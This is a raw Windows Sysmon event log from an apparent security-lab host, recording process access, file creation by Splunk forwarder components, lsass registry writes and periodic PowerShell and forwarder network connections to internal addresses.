15:00:04.131{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342500Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:04.131{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342499Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:04.131{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342498Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:04.131{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342497Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:04.131{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-72F4-613B-37B4-03000000C801}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342496Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:04.131{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-72F4-613B-37B4-03000000C801}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342495Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:04.116{B81B27B7-72F4-613B-37B4-03000000C801}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342515Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:05.277{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AC7443D1BFF588821C9B92876799FC8,SHA256=E05D4EA4AB8714C46E6AACEF62603BA8AC71447D682F861BD0D9A9C4E4ADF89C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342514Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:05.130{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A3DB9C6E9D2BC1E509FA396349DAFFB,SHA256=F185D17E94DAB56CF456A2FC8A64C6A35157322A3B4FC64A9F51FAB762B2F988,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342513Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:05.130{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E24F56CDC52054154170CA8DC8E19813,SHA256=F54D1896BB9B2B24CF24D52EC1E4E6EA8094E78CBA7BA55FF3097E168E217A96,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342519Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:32.347{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52435-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035342518Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:32.197{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52434-false10.0.1.12-8000- 23542300x800000000000000035342517Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:06.396{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5702D5459666079EFD11F82A836868BD,SHA256=1033A049C36A283176821EA0071A8C037FB14A35ACF7DFABE810F2AD2D0C0932,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342516Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:06.295{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13E37CF6ED7457686E245768F329727B,SHA256=6C2962CF6F8D2F150D52C0C40F33F1C1C61E32262B30221BCD49CAAC18437F43,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342520Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:07.314{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1920B0F7F8C6A9D956CB2404B1F74CB,SHA256=B4844553BE900287BFA480221AFF82CB3BC61B65D5A0166B0186BD8FD4ADA824,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342521Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:08.331{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71AEFE6F10346D98B21C6BD687E6F4F7,SHA256=B9B591BD066479BD124934B75EEDFB4A355D9D66258154A3B5DBEF81ADD737EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342522Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:09.362{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D986613C7C65614E2073110BC4BFA681,SHA256=0FF443DF9369C9EF84FBCFDE769206E5B165FFE2691696ED03EDA572FCD27D32,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342525Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:36.347{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52436-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342524Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:10.396{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=106B79546574AA3909C57D71B327C14A,SHA256=7DB4B9152843F1646CE0ACFCB693707BD00CCA6133C512E066F45E431388CA94,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342523Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:10.394{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B0664225C88A7322DFC5C15B2B3CC94,SHA256=4DC9936E2FD5BFB3BB4140C81379AE164F20E55A4CE3DA448A087573C6073293,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342536Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:11.413{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA99EF1CBD27753521E2190B07AAF197,SHA256=655A35581410F6F2FA341D7951A3E82BFC7A5A1C6388E83ECE895FCD22A2D715,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000035342535Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:00:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000035342534Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:00:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x75f7576e) 13241300x800000000000000035342533Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:00:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a64c-0x2b87534f) 13241300x800000000000000035342532Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:00:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a654-0x8d4bbb4f) 13241300x800000000000000035342531Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:00:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a65c-0xef10234f) 13241300x800000000000000035342530Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:00:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000035342529Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:00:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x75f7576e) 13241300x800000000000000035342528Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:00:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a64c-0x2be8cb05) 13241300x800000000000000035342527Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:00:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a654-0x8dad3305) 13241300x800000000000000035342526Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-10 15:00:11.329{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a65c-0xef719b05) 23542300x800000000000000035342537Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:12.415{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EAE18D86B706935A67F3EF78B19B466,SHA256=13521505F9B246B95AEBB9E598AF3843E45F95055C3D294D538924391873DA17,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342539Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:38.076{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52437-false10.0.1.12-8000- 23542300x800000000000000035342538Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:13.445{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F775EEA2B489A93625F2A237DC63F664,SHA256=D17A14BC495CE1A7F25ACBC158CFB63A448E653BB70FA0F1C5954F902E2DBF3B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342540Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:14.493{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=428EDBE3D53DD20046ED28AB8AEE74A5,SHA256=72313C5472F3CE5F94533B0358140E95CEADF3358A6B8BB2521C4E2D43D6F560,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342541Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:15.527{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D7BE8E2A14D837DB560157EA95C18F6,SHA256=6CC400747B34644EA9FEAFE6558B3DC09E1970D6A3A8F5D549065DF3D33D2CF5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342544Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:42.360{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52438-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342543Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:16.592{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=54DF5DE80188C31730F5C8E767A7B3E1,SHA256=E6853C2F4D1B26190DFDFDDB5E856DCC8F572CD790AE123A554949EBD8817DC2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342542Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:16.542{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDCF0694919BC3A1E7BE9C7BCB88359E,SHA256=E870716D945777E149E300AAE5D52D77CCC16AA064A4E49C49F8C31DDFE9A0B2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342555Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:43.242{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52439-false10.0.1.12-8000- 10341000x800000000000000035342554Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:17.595{B81B27B7-7301-613B-39B4-03000000C801}19324684C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035342553Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:17.573{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B61FF77483E1B51AD590FE54231B0C05,SHA256=B3995F153BFD9C2E1C5520669A84FAA42A55E7E5DC1AD241A8E9F32DF0E65239,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342552Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:17.394{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7301-613B-39B4-03000000C801}1932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342551Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:17.394{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342550Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:17.394{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342549Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:17.394{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342548Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 